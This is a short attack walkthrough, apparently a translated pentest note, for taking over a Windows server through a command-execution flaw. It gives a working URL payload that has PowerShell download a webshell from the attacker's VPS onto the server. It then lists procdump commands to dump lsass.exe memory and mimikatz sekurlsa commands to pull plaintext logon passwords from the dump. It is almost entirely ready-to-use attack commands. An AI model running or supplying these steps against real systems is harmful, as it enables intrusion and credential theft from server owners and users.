premise:
There is a windows server for command execution
Use:
1. Upload the one-sentence Trojan to your vps, and execute the command to download the one-sentence Trojan to the server through the command execution vulnerability (need to know the absolute path)
http://url?pwd=zs&cmd=cmd+/c+powershell+(new-object System.Net.WebClient).DownloadFile('http://vps/shell.txt','C:/绝对路径/shy.jsp')
2. Use a chopper to connect, upload procdump64.exe to capture the lsass.exe process
./procdump64.exe -accepteula -ma lsass.exe lsass.dmp
3. Copy the captured lsass.dmp to the local, and use mimikatz to capture the plaintext locally
mimikatz.exe
"sekurlsa::minidump lsass.dmp"
"sekurlsa::logonPasswords full"
exit
看只要密码强度够,就抓不到明文,就不上图了。